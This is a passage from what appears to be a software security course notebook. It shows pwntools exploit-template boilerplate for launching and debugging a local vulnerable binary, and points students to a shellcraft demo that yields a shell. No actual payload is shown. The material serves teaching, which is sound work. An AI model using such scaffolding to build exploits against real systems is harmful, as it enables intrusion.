        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#================================

### See the complete demo

- see the demo `demos/pwntools/shellcraft/exploit_vuln_arg.py`
- open a Terminal and cd into the `shellcraft` folder
- run the exploit code from the Terminal to interact with the exploited shell

In [111]:
! pwd

/home/kali/Sp25/SoftwareSecurity/demos/pwntools/shellcraft


In [113]:
! cat exploit_vuln_arg.py

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template vuln_cpp.exe
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF(args.EXE or 'vuln.exe')

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#======================================